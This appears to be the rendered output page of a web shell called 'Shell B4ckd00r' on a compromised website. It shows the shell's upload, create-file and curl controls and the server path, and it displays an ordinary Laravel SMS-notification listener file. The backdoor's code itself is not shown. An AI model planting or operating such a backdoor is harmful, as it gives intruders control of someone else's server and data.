Shell B4ckd00r
Current Dir :
/
home
/
u789730693
/
domains
/
piorasplash.com
/
public_html
/
app
/
Listeners
/
Home
Upload
Create Dir
Create File
Curl
Current File : /home/u789730693/domains/piorasplash.com/public_html/app/Listeners/SendOrderSmsNotification.php
<?php namespace App\Listeners; use App\Events\SendOrderSms; use App\Services\OrderSmsNotificationBuilder; use Illuminate\Support\Facades\Log; class SendOrderSmsNotification { public function handle(SendOrderSms $event): void { try{ $orderSmsNotificationBuilderService = new OrderSmsNotificationBuilder($event->info['order_id'], $event->info['status']); $orderSmsNotificationBuilderService->send(); } catch(\Exception $e) { Log::info($e->getMessage()); } } }
v.01